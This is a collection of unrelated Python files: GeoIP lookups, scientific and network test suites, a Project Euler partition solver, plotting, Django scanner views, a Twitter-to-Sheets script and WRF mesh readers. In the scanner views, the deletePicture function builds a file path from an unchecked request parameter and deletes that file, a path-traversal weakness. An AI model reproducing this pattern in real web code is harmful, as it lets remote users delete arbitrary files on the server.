except Exception as _:
pass
if subdivision is None:
subdivision = ""
city = ""
try:
city = response.city.name
city = response.city.names['zh-CN']
except Exception as _:
pass
if city is None:
city = ""
result = f"{country} {subdivision} {city}"
Xcache.set_city_reader_cache(ip, result)
return result
@staticmethod
def get_asn(ip):
asn_reader = Xcache.get_asn_reader_cache(ip)
if asn_reader is not None:
return asn_reader
asn_mmdb_dir = os.path.join(settings.BASE_DIR, 'STATICFILES', 'STATIC', 'GeoLite2-ASN.mmdb')
asn_reader = geoip2.database.Reader(asn_mmdb_dir)
try:
response = asn_reader.asn(ip)
except Exception as _:
Xcache.set_asn_reader_cache(ip, "")
return ""
Xcache.set_asn_reader_cache(ip, response.autonomous_system_organization)
return response.autonomous_system_organization
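# --- Usage sketch (illustrative only) ---
# Requires Django settings to be configured, the GeoLite2 mmdb files under
# STATICFILES/STATIC, and a working Xcache backend; the IP is just an example.
# city = Geoip.get_city("8.8.8.8")
# asn = Geoip.get_asn("8.8.8.8")
# logger.info("%s / %s" % (city, asn))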
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Test `astropy.utils.timer`.
.. note::
The tests only compare rough estimates as
performance is machine-dependent.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
# STDLIB
import time
# LOCAL
from ..timer import RunTimePredictor
def func_to_time(x):
"""This is sleeps for x seconds for timing tests."""
time.sleep(x)
return 'Slept for {0} second(s)'.format(x)
def test_timer():
p = RunTimePredictor(func_to_time)
try:
p.do_fit()
except AssertionError as e:
assert str(e) == 'Requires 3 points but has 0'
try:
p.predict_time(100)
except AssertionError as e:
assert str(e) == 'No fitted data for prediction'
p.time_func([0.1, 0.2, 0.5, 'a', 1.5])
p.time_func(1.0)
assert p._funcname == 'func_to_time'
assert p._cache_bad == ['a']
assert p.results == {0.1: 'Slept for 0.1 second(s)',
0.2: 'Slept for 0.2 second(s)',
0.5: 'Slept for 0.5 second(s)',
1.5: 'Slept for 1.5 second(s)',
1.0: 'Slept for 1.0 second(s)'}
a = p.do_fit()
assert p._power == 1
# Perfect slope is 1, with 10% uncertainty
assert 0.9 <= a[0] <= 1.1
# Perfect intercept is 0, with 1-sec uncertainty
assert -1 <= a[1] <= 1
# Perfect answer is 100, with 10% uncertainty
t = p.predict_time(100)
assert 90 <= t <= 110
# Repeated call to access cached run time
t2 = p.predict_time(100)
assert t == t2
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2020 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Unit tests for the InterpolateUsingDifference plugin."""
import unittest
import numpy as np
from numpy.testing import assert_array_equal
from improver.utilities.interpolation import InterpolateUsingDifference
from improver.utilities.warnings_handler import ManageWarnings
from ..set_up_test_cubes import add_coordinate, set_up_variable_cube
class Test_Setup(unittest.TestCase):
"""Set up for InterpolateUsingDifference tests."""
def setUp(self):
""" Set up arrays for testing."""
snow_sleet = np.array(
[[5.0, 5.0, 5.0], [10.0, 10.0, 10.0], [5.0, 5.0, 5.0]], dtype=np.float32
)
sleet_rain = np.array(
[[4.0, 4.0, 4.0], [np.nan, np.nan, np.nan], [3.0, 3.0, 3.0]],
dtype=np.float32,
)
sleet_rain = np.ma.masked_invalid(sleet_rain)
limit_data = np.array(
[[4.0, 4.0, 4.0], [10.0, 8.0, 6.0], [4.0, 4.0, 4.0]], dtype=np.float32
)
self.snow_sleet = set_up_variable_cube(
snow_sleet,
name="altitude_of_snow_falling_level",
units="m",
spatial_grid="equalarea",
)
self.sleet_rain = set_up_variable_cube(
sleet_rain,
name="altitude_of_rain_falling_level",
units="m",
spatial_grid="equalarea",
)
self.limit = set_up_variable_cube(
limit_data, name="surface_altitude", units="m", spatial_grid="equalarea"
)
class Test_repr(unittest.TestCase):
"""Test the InterpolateUsingDifference __repr__ method."""
def test_basic(self):
"""Test expected string representation is returned."""
self.assertEqual(
str(InterpolateUsingDifference()), "<InterpolateUsingDifference>"
)
class Test__check_inputs(Test_Setup):
"""Tests for the private _check_inputs method."""
def test_incomplete_reference_data(self):
"""Test an exception is raised if the reference field is incomplete."""
self.snow_sleet.data[1, 1] = np.nan
msg = "The reference cube contains np.nan data"
with self.assertRaisesRegex(ValueError, msg):
InterpolateUsingDifference()._check_inputs(
self.sleet_rain, self.snow_sleet, None
)
def test_incompatible_reference_cube_units(self):
"""Test an exception is raised if the reference cube has units that
are incompatible with the input cube."""
self.snow_sleet.units = "s"
msg = "Reference cube and/or limit do not have units compatible"
with self.assertRaisesRegex(ValueError, msg):
InterpolateUsingDifference()._check_inputs(
self.sleet_rain, self.snow_sleet, None
)
def test_incompatible_limit_units(self):
"""Test an exception is raised if the limit cube has units that
are incompatible with the input cube."""
self.limit.units = "s"
msg = "Reference cube and/or limit do not have units compatible"
with self.assertRaisesRegex(ValueError, msg):
InterpolateUsingDifference()._check_inputs(
self.sleet_rain, self.snow_sleet, limit=self.limit
)
def test_convert_units(self):
"""Test that a reference cube and limit cube with different but
compatible units are converted without an exception being raised."""
self.snow_sleet.convert_units("cm")
self.limit.convert_units("cm")
InterpolateUsingDifference().process(
self.sleet_rain, self.snow_sleet, limit=self.limit
)
class Test_process(Test_Setup):
"""Test the InterpolateUsingDifference process method."""
def test_unlimited(self):
"""Test interpolation to complete an incomplete field using a reference
field. No limit is imposed upon the returned interpolated values."""
expected = np.array(
[[4.0, 4.0, 4.0], [8.5, 8.5, 8.5], [3.0, 3.0, 3.0]], dtype=np.float32
)
result = InterpolateUsingDifference().process(self.sleet_rain, self.snow_sleet)
assert_array_equal(result.data, expected)
self.assertEqual(result.coords(), self.sleet_rain.coords())
self.assertEqual(result.metadata, self.sleet_rain.metadata)
def test_maximum_limited(self):
"""Test interpolation to complete an incomplete field using a reference
field. A limit is imposed upon the returned interpolated values,
forcing these values to the maximum limit if they exceed it."""
expected = np.array(
[[4.0, 4.0, 4.0], [8.5, 8.0, 6.0], [3.0, 3.0, 3.0]], dtype=np.float32
)
result = InterpolateUsingDifference().process(
self.sleet_rain, self.snow_sleet, limit=self.limit, limit_as_maximum=True
)
assert_array_equal(result.data, expected)
self.assertEqual(result.coords(), self.sleet_rain.coords())
self.assertEqual(result.metadata, self.sleet_rain.metadata)
def test_minimum_limited(self):
"""Test interpolation to complete an incomplete field using a reference
field. A limit is imposed upon the returned interpolated values,
forcing these values to the minimum limit if they are below it."""
expected = np.array(
[[4.0, 4.0, 4.0], [10.0, 8.5, 8.5], [3.0, 3.0, 3.0]], dtype=np.float32
)
result = InterpolateUsingDifference().process(
self.sleet_rain, self.snow_sleet, limit=self.limit, limit_as_maximum=False
)
assert_array_equal(result.data, expected)
self.assertEqual(result.coords(), self.sleet_rain.coords())
self.assertEqual(result.metadata, self.sleet_rain.metadata)
def test_multi_realization_limited(self):
"""Test interpolation to complete an incomplete field using a reference
field. A limit is imposed upon the returned interpolated values,
forcing these values to the minimum limit if they are below it. The
inputs are multi-realization."""
snow_sleet = add_coordinate(self.snow_sleet, [0, 1], "realization")
sleet_rain = add_coordinate(self.sleet_rain, [0, 1], "realization")
expected = np.array(
[[4.0, 4.0, 4.0], [10.0, 8.5, 8.5], [3.0, 3.0, 3.0]], dtype=np.float32
)
result = InterpolateUsingDifference().process(
sleet_rain, snow_sleet, limit=self.limit, limit_as_maximum=False
)
assert_array_equal(result[0].data, expected)
assert_array_equal(result[1].data, expected)
self.assertEqual(result.shape, sleet_rain.shape)
self.assertEqual(result.coords(), sleet_rain.coords())
self.assertEqual(result.metadata, sleet_rain.metadata)
def test_crossing_values(self):
"""Test interpolation when the reference field and field to be
completed by interpolation cross one another. In the absence of any
limit it should be possible to return an interpolated field of values
that pass through the reference field in an expected way. In another
case we apply the reference field as a lower bound to the interpolated
values."""
snow_sleet = np.array(
[[15.0, 15.0, 15.0], [10.0, 10.0, 10.0], [8.0, 8.0, 8.0]], dtype=np.float32
)
sleet_rain = np.array(
[[5.0, 5.0, 5.0], [np.nan, np.nan, np.nan], [15.0, 15.0, 15.0]],
dtype=np.float32,
)
sleet_rain = np.ma.masked_invalid(sleet_rain)
self.snow_sleet.data = snow_sleet
self.sleet_rain.data = sleet_rain
expected_unlimited = np.array(
[[5.0, 5.0, 5.0], [8.5, 8.5, 8.5], [15.0, 15.0, 15.0]], dtype=np.float32
)
expected_limited = np.array(
[[5.0, 5.0, 5.0], [10.0, 10.0, 10.0], [15.0, 15.0, 15.0]], dtype=np.float32
)
result_unlimited = InterpolateUsingDifference().process(
self.sleet_rain, self.snow_sleet
)
result_limited = InterpolateUsingDifference().process(
self.sleet_rain,
self.snow_sleet,
limit=self.snow_sleet,
limit_as_maximum=False,
)
assert_array_equal(result_unlimited.data, expected_unlimited)
assert_array_equal(result_limited.data, expected_limited)
def test_linear_failure(self):
"""Test that if the use of linear interpolation does not result in a
complete difference field, and thus a complete field of interest, the
secondary use of nearest neighbour interpolation completes the
field."""
sleet_rain = np.array(
[[np.nan, np.nan, 4.0], [np.nan, np.nan, np.nan], [3.0, 3.0, 3.0]],
dtype=np.float32,
)
sleet_rain = np.ma.masked_invalid(sleet_rain)
self.sleet_rain.data = sleet_rain
expected = np.array(
[[3.5, 4.0, 4.0], [8.5, 8.5, 8.5], [3.0, 3.0, 3.0]], dtype=np.float32
)
result = InterpolateUsingDifference().process(self.sleet_rain, self.snow_sleet)
assert_array_equal(result.data, expected)
self.assertEqual(result.coords(), self.sleet_rain.coords())
self.assertEqual(result.metadata, self.sleet_rain.metadata)
@ManageWarnings(record=True)
def test_unmasked_input_cube(self, warning_list=None):
"""Test a warning is raised if the input cube is not masked and that
the input cube is returned unchanged."""
self.sleet_rain.data = np.ones((3, 3), dtype=np.float32)
expected = self.sleet_rain.copy()
warning_msg = "Input cube unmasked, no data to fill in, returning"
result = InterpolateUsingDifference().process(self.sleet_rain, self.snow_sleet)
self.assertEqual(result, expected)
self.assertTrue(any(item.category == UserWarning for item in warning_list))
self.assertTrue(any(warning_msg in str(item) for item in warning_list))
def test_convert_units(self):
"""Test that a reference cube and limit cube with different but
compatible units are converted for use and return the expected
result."""
expected = np.array(
[[4.0, 4.0, 4.0], [8.5, 8.0, 6.0], [3.0, 3.0, 3.0]], dtype=np.float32
)
self.snow_sleet.convert_units("cm")
self.limit.convert_units("cm")
result = InterpolateUsingDifference().process(
self.sleet_rain, self.snow_sleet, limit=self.limit
)
assert_array_equal(result.data, expected)
self.assertEqual(result.coords(), self.sleet_rain.coords())
self.assertEqual(result.metadata, self.sleet_rain.metadata)
if __name__ == "__main__":
unittest.main()
|
import os
import ptf
from ptf.base_tests import BaseTest
from ptf.mask import Mask
from ptf.packet import Ether
from ptf import config
import ptf.testutils as testutils
class DataplaneBaseTest(BaseTest):
def __init__(self):
BaseTest.__init__(self)
def setUp(self):
self.dataplane = ptf.dataplane_instance
self.dataplane.flush()
if config["log_dir"] != None:
filename = os.path.join(config["log_dir"], str(self)) + ".pcap"
self.dataplane.start_pcap(filename)
def tearDown(self):
if config["log_dir"] != None:
self.dataplane.stop_pcap()
class OneTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pkt = "ab" * 20
pkt = pkt.encode()
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
class GetMacTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
def check_mac(device, port):
mac = self.dataplane.get_mac(device, port)
self.assertIsNotNone(mac)
self.assertEqual(mac.decode().count(":"), 5)
check_mac(0, 1)
pkt = "ab" * 20
pkt = pkt.encode()
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
check_mac(1, 1)
class GetCountersTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
def check_counters(device, port):
counters = self.dataplane.get_nn_counters(device, port)
self.assertIsNotNone(counters)
self.assertTrue(type(counters) is tuple)
self.assertEqual(len(counters), 2)
return counters
counters_01_b = check_counters(0, 1)
counters_11_b = check_counters(1, 1)
print("Counters:")
print(" (0, 1) %d:%d" % counters_01_b)
print(" (1, 1) %d:%d" % counters_11_b)
pkt = "ab" * 20
pkt = pkt.encode()
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
counters_01_e = check_counters(0, 1)
counters_11_e = check_counters(1, 1)
print("Counters:")
print(" (0, 1) %d:%d" % counters_01_e)
print(" (1, 1) %d:%d" % counters_11_e)
self.assertTrue(counters_01_e[1] > counters_01_b[1])
self.assertTrue(counters_11_e[0] > counters_11_b[0])
class VerifyAnyPacketAnyPort(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pkt = "ab" * 20
pkt = pkt.encode()
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_any_packet_any_port(
self, pkts=[pkt], ports=[3, 1], device_number=1)
# negative test: if the packet is indeed received, but not on one of the
# expected ports, the test should fail
with self.assertRaises(AssertionError):
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_any_packet_any_port(
self, pkts=[pkt], ports=[0, 2, 3], device_number=1)
print("Verify masked packets")
pkt1 = testutils.simple_udp_packet(eth_dst="00:11:11:11:11:11")
pkt2 = testutils.simple_udp_packet(eth_dst="00:22:22:22:22:22")
exp_pkt = Mask(pkt2)
exp_pkt.set_do_not_care_scapy(Ether, 'dst')
testutils.send_packet(self, (0, 1), pkt1)
print("Packet sent")
# pkt2 will not be received
# pkt2 with masked eth_dst field will match
testutils.verify_any_packet_any_port(
self, pkts=[pkt2, exp_pkt], ports=[0, 1], device_number=1)
# negative tests
with self.assertRaises(AssertionError):
testutils.send_packet(self, (0, 1), pkt1)
print("Packet sent")
# incorrect ports
testutils.verify_any_packet_any_port(
self, pkts=[exp_pkt], ports=[0, 2, 3], device_number=1)
with self.assertRaises(AssertionError):
testutils.send_packet(self, (0, 1), pkt1)
print("Packet sent")
# incorrect packet
testutils.verify_any_packet_any_port(
self, pkts=[pkt2], ports=[0, 1], device_number=1)
class RemovePort(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pkt = "ab" * 20
pkt = pkt.encode()
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
# We remove a port to test port_remove, but in order to execute
# subsequent tests, we need to make sure we re-add the port
# afterwards. In order to re-add the port, we need the interface name,
# which is what this method is for. This is a little hacky but fine for
# testing. In practice, you would not be removing ports which are part
# of the original ptf config.
def find_ifname(device_number, port_number):
for port_id, ifname in config["port_map"].items():
if (device_number, port_number) == port_id:
return ifname
ifname = find_ifname(1, 1)
self.assertTrue(self.dataplane.port_remove(1, 1))
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_no_other_packets(self, device_number=1)
self.dataplane.port_add(ifname, 1, 1)
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
testutils.verify_no_other_packets(self, 1)
class SimpleTcpPacketTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pktlen = 400
pkt = testutils.simple_tcp_packet(pktlen=pktlen)
self.assertEqual(len(pkt), pktlen)
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
testutils.verify_no_other_packets(self, 1)
class SimpleIpv4PacketTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pktlen = 70
pkt = testutils.simple_ipv4ip_packet(pktlen=pktlen)
self.assertEqual(len(pkt), pktlen)
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
testutils.verify_no_other_packets(self, 1)
class SimpleIpv6PacketTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pktlen = 400
pkt = testutils.simple_ipv6ip_packet(pktlen=pktlen)
self.assertEqual(len(pkt), pktlen)
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
testutils.verify_no_other_packets(self, 1)
class Ipv4InIpv4PacketTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pktlen = 70
pkt = testutils.simple_ipv4ip_packet(pktlen=pktlen)
pkt2 = testutils.simple_ipv4ip_packet(pktlen=pktlen, inner_frame=pkt["IP"])
testutils.send_packet(self, (0, 1), pkt2)
print("packet sent")
testutils.verify_packet(self, pkt2, (1, 1))
testutils.verify_no_other_packets(self, 1)
class Ipv6InGREPacketTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pktlen = 1000
udp = testutils.simple_udp_packet()
ipv6 = testutils.simple_ipv6ip_packet(inner_frame=udp['UDP'])
gre = testutils.simple_grev6_packet(pktlen=pktlen, inner_frame=ipv6["IPv6"])
self.assertEqual(gre['GRE'].proto, 0x86DD)
testutils.send_packet(self, (0, 1), gre)
print("packet sent")
testutils.verify_packet(self, gre, (1, 1))
testutils.verify_no_other_packets(self, 1)
class VerifyPacketsOnMultiplePortListsTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pkt1 = testutils.simple_udp_packet(eth_dst="00:11:11:11:11:11")
pkt2 = testutils.simple_udp_packet(eth_dst="00:22:22:22:22:22")
testutils.send_packet(self, (0, 1), pkt1)
testutils.send_packet(self, (0, 1), pkt2)
print("Packets sent")
# pkt1 will be received on one of ports (0, 1)
# pkt2 will be received on one of ports (1, 2, 3)
testutils.verify_each_packet_on_multiple_port_lists(
self, pkts=[pkt1, pkt2], ports=[[0, 1], [1, 2, 3]], device_number=1)
# negative test
with self.assertRaises(AssertionError):
testutils.send_packet(self, (0, 1), pkt1)
testutils.send_packet(self, (0, 1), pkt2)
print("Packets sent")
# pkt1 will not be received on one of ports (0, 2, 3)
# pkt1 will not be received on one of ports (1, 2, 3); it will be pkt2
testutils.verify_each_packet_on_multiple_port_lists(
self, pkts=[pkt1, pkt1], ports=[[0, 2, 3], [0, 1]],
device_number=1)
|
#!/usr/bin/env python3
import lib
N=1_000_000
MX=1000
def partition2(n):
""" Coin partitions. Let partition(n) represent the number of different ways in which n coins can be separated into piles.
For example, five coins can be separated into piles in exactly seven different ways, so partition(5)=7. """
    # dynamic programming table: cell (i,j) with pile size = i + 1, target n = j + 1, cell value = partition(n)
dp = {} # using dict as dynamic programming table is really slow
for i in range(n):
dp[(0,i)] = 1 # One way to partition any n using piles of size 1
dp[(i,0)] = 1 # One way to partition n=1
for i in range(1,n):
for j in range(1,n):
value = dp[(i-1,j)] # Include ways to partition n using piles <i
if i == j:
value += 1 # One way to make n using piles of the same size
elif j > i:
value += dp[(i,j-i-1)] # Include ways to make j-i using piles of size <i
dp[(i,j)] = value
if i == j:
print(i+1,value)
if value % N == 0:
print('result',i+1,value)
return value
return dp[(n-1,n-1)]
def partition1(n):
""" Coin partitions. Let partition(n) represent the number of different ways in which n coins can be separated into piles.
For example, five coins can be separated into piles in exactly seven different ways, so partition(5)=7. """
    # dynamic programming table: cell (i,j) with pile size = i + 1, target n = j + 1, cell value = partition(n)
dp = [[0]*n for i in range(n)]
for i in range(n):
dp[0][i] = 1 # One way to partition any n using piles of size 1
dp[i][0] = 1 # One way to partition n=1
for i in range(1,n):
for j in range(1,n):
value = dp[i-1][j] # Include ways to partition n using piles <i
if i == j:
value += 1 # One way to make n using piles of the same size
elif j > i:
value += dp[i][j-i-1] # Include ways to make j-i using piles of size <i
dp[i][j] = value % N
if i == j:
if i%100 == 0: print(i+1,value)
if value % N == 0:
print('result',i+1,value)
return value
return dp[n-1][n-1]
def partition3(n):
""" Coin partitions. Let partition(n) represent the number of different ways in which n coins can be separated into piles.
For example, five coins can be separated into piles in exactly seven different ways, so partition(5)=7. """
# dynamic programming table
# p(n) = p(n - gpenta(1)) + p(n - gpenta(2)) - p(n - gpenta(3)) - p(n - gpenta(4)) ...
dp = [0]*(n+1)
dp[0] = 1
for i in range(1,n+1):
penta = 1
value = 0
k = 0
while i-lib.gpentagonal(penta) >= 0:
sign = 1 if k < 2 else -1
value += sign * dp[i-lib.gpentagonal(penta)]
penta += 1
k = (k + 1) % 4
dp[i] = value % N
if dp[i] % N == 0:
print(' solution',i,dp[i])
return dp[i]
return dp[n]
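# Added sketch: a self-contained check of the pentagonal-number recurrence used
# in partition3 above. It assumes lib.gpentagonal(k) returns the k-th generalized
# pentagonal number in the order 1, 2, 5, 7, 12, 15, ... (m = 1, -1, 2, -2, ...);
# the helper below is a stand-in for that assumption, not the real lib code.
def _gpentagonal_demo(k):
    m = (k + 1) // 2 if k % 2 else -(k // 2)  # m = 1, -1, 2, -2, ...
    return m * (3 * m - 1) // 2

def _partition_demo(n):
    # p(n) = p(n - g(1)) + p(n - g(2)) - p(n - g(3)) - p(n - g(4)) + ... (signs repeat + + - -)
    p = [0] * (n + 1)
    p[0] = 1
    for i in range(1, n + 1):
        k, sign_cycle, total = 1, 0, 0
        while i - _gpentagonal_demo(k) >= 0:
            total += (1 if sign_cycle < 2 else -1) * p[i - _gpentagonal_demo(k)]
            k += 1
            sign_cycle = (sign_cycle + 1) % 4
        p[i] = total
    return p[n]

assert _partition_demo(5) == 7    # five coins -> seven pile arrangements
assert _partition_demo(10) == 42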
for i in range(1,10):
if partition1(i) != partition3(i):
print (i,partition3(i),'should be',partition1(i))
#lib.print2d(partition(5),rows=range(1,6),cols=range(1,6))
print(partition3(100000))
|
# imports
import matplotlib.pyplot as plt
import numpy as np
import os
# load log files
files = [os.path.join('log', file) for file in os.listdir('./log/')
if file.endswith('.bin')]
files = [file for file in files if os.path.isfile(file)]
linestyles = ['-', '--', '-.']
colorwheel = ['r', 'g', 'b', 'k']
# load data
for i, file in enumerate(files):
arr = np.fromfile(file)
# reshape matrix (nsteps x 15)
arr = np.reshape(arr, (-1, 15))
# get the solver name
label = file.split('-')[0]
label = label[label.index('/') + 1:]
label += '-GPU' if 'gpu' in file else ''
# plot Temperature
plt.plot(arr[:, 0], arr[:, 1],
linestyle=linestyles[i % len(linestyles)],
label=label, color=colorwheel[i % len(colorwheel)])
# make legend
plt.legend(loc=0)
# title and labels
plt.title('H2/CO Constant Pressure Ignition')
plt.xlabel('Time (s)')
plt.ylabel('Temperature (K)')
# and save fig
plt.gcf().set_size_inches(5, 3)  # savefig has no `size` keyword; set the figure size instead
plt.savefig('h2ign.png', dpi=300)
|
from django.shortcuts import render
from django.http import HttpResponse
import subprocess
import re
import random
import string
import time
import os
'''
For this code to work:
1) The user running the web server (www-data) must be in the group lp.
2) The command scanimage -L must be available.
'''
# Constants
SCAN_DIR = '/mnt/raid/scanner/'
def show(request):
return render(request, 'scanner/index.html')
def scannerList(request):
cmdOut = subprocess.Popen(['scanimage', '-L'], stdout = subprocess.PIPE).communicate()[0].decode()
ret = 'None'
listOfMatches = re.findall(r'device\s.(.+).\sis\sa\s.+$', cmdOut)
# listOfMatches = re.findall(r'device\s.+\sis\sa\s(.+)$', cmdOut)
if (len(listOfMatches) > 0):
ret = '\n'.join(listOfMatches)
return HttpResponse(ret)
def scan(request):
scannerProvided = request.GET.get('s', 'error')
# If the scanner is not valid we do not do anything
valid = False
cmdOut = subprocess.Popen(['scanimage', '-L'], stdout = subprocess.PIPE).communicate()[0].decode()
listOfMatches = re.findall(r'device\s.(.+).\sis\sa\s.+$', cmdOut)
for match in listOfMatches:
if (scannerProvided == match):
valid = True
break
if (not valid):
return HttpResponse('ERROR')
# Now that we know that the name of the scanner provided is valid, we can scan
#cmdOut = subprocess.Popen(['scanimage', '--resolution=300', '-d', scannerProvided], stdout = subprocess.PIPE).communicate()[0]
# Writing image to file
randstr = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(10)])
filePath = '/tmp/' + randstr + '.ppm'
#f = open(filePath, 'w')
#f.write(cmdOut)
#f.close()
subprocess.call(['scanimage', '--resolution=300', '-d', scannerProvided], stdout=open(filePath, 'wb'))  # avoid building a shell command via string concatenation
# Converting image in PPM format to JPG
newFilePath = SCAN_DIR + time.strftime("%a %d %b %Y - %H:%M:%S") + '.jpg'
#subprocess.Popen(['convert', '-quality', '60', filePath, newFilePath], stdout = subprocess.PIPE).communicate()[0]
subprocess.call(['convert', '-quality', '60', filePath, newFilePath])
os.remove(filePath)
return HttpResponse('OK')
def deletePicture(request):
picture = SCAN_DIR + request.GET.get('p', 'error')
if (os.path.isfile(picture)):
os.remove(picture)
return HttpResponse('OK')
else:
return HttpResponse('ERROR')
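# Hedged illustration (added, not part of the original views): how the regex in
# scannerList/scan pulls the device name out of one line of `scanimage -L`
# output. The sample line below is a made-up example of that format.
if __name__ == '__main__':
    sampleLine = "device `epson2:libusb:001:004' is a Epson Perfection V300 flatbed scanner"
    print(re.findall(r'device\s.(.+).\sis\sa\s.+$', sampleLine))  # ['epson2:libusb:001:004']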
|
import pytest
from py_cdk_utils import DeployEnv, get_config
test_default = "default"
test_overrides = {DeployEnv.DEV: "dev val", DeployEnv.LOCAL: "local val"}
def test_no_args():
with pytest.raises(TypeError):
get_config()
def test_default_value():
with pytest.raises(TypeError):
get_config(default_value="test")
def test_override_only():
with pytest.raises(TypeError):
get_config({DeployEnv.DEV: "dev value"})
def test_valid_multiple_overrides_none_qualify(mocker):
mocker.patch("py_cdk_utils.environments.deploy_env", DeployEnv.PROD)
assert get_config(test_default, test_overrides) == test_default
def test_valid_multiple_one_qualifies(mocker):
mocker.patch("py_cdk_utils.environments.deploy_env", DeployEnv.DEV)
assert get_config(test_default, test_overrides) == "dev val"
|
import pandas as pd
import gspread
import os
import requests
from oauth2client.service_account import ServiceAccountCredentials
def connect_to_twitter():
bearer_token = os.environ.get("BEARER_TOKEN")
return {"Authorization": "Bearer {}".format(bearer_token)}
def make_request(headers):
url = "https://api.twitter.com/2/tweets"
params = {
"tweet.fields": "author_id,created_at,lang",
"ids": "21,1293593516040269825,1334542969530183683",
}
return requests.request("GET", url, headers=headers, params=params).json()
def make_df(response):
return pd.DataFrame(response["data"])
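# Minimal sketch (added for illustration) of the payload shape make_df expects
# from the /2/tweets endpoint; the sample dict below is a made-up stand-in for
# demonstration only, not a recorded API response.
def _demo_make_df():
    sample_response = {
        "data": [
            {"id": "21", "text": "just setting up my twttr",
             "author_id": "12", "created_at": "2006-03-21T20:50:14.000Z", "lang": "en"},
        ]
    }
    return make_df(sample_response)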
def authenticate_to_google():
scope = ["https://spreadsheets.google.com/feeds"]
credentials = ServiceAccountCredentials.from_json_keyfile_name(
"/path/to/your/file.json", scope
)
return credentials
def main():
headers = connect_to_twitter()
response = make_request(headers)
df = make_df(response)
credentials = authenticate_to_google()
gc = gspread.authorize(credentials)
workbook = gc.open_by_key("spreadsheet_id")
sheet = workbook.worksheet("Sheet1")
sheet.update("A1", [df.columns.values.tolist()] + df.values.tolist())
if __name__ == "__main__":
main()
|
import numpy as np
import xarray as xr
import pandas as pd
from xgcm import Grid
WRF_NEW_DIMS = {'south_north': 'y_c', 'south_north_stag': 'y_g',
'west_east': 'x_c', 'west_east_stag': 'x_g'}
WRF_NEW_COORDS = {'XLONG_M': 'lon_T', 'XLAT_M': 'lat_T',
'XLONG_U': 'lon_U', 'XLAT_U': 'lat_U',
'XLONG_V': 'lon_V', 'XLAT_V': 'lat_V'}
WRF_NEW_MESH = {'F': 'f_T'}
WRF_NEW_MASK = {'LANDMASK': 'mask_T'}
def dlondlat_dxdy(dlon, dlat, lon, lat):
EARTH_RADIUS = 6371 * 1000
dx = np.cos(np.pi / 180. * lat) * np.pi / 180. * EARTH_RADIUS * dlon
dy = (lon * 0 + 1) * np.pi / 180. * EARTH_RADIUS * dlat
return dx, dy
def read_mask(file):
original_mesh = xr.open_dataset(file).squeeze()
mask = original_mesh[list(WRF_NEW_MASK)].rename(WRF_NEW_MASK)
coords = original_mesh[list(WRF_NEW_COORDS)].rename(WRF_NEW_COORDS)
mask = mask.assign_coords(coords).rename_dims(WRF_NEW_DIMS)
return mask
def read_mesh(file):
original_mesh = xr.open_dataset(file).squeeze()
mesh = original_mesh[list(WRF_NEW_MESH)].rename(WRF_NEW_MESH)
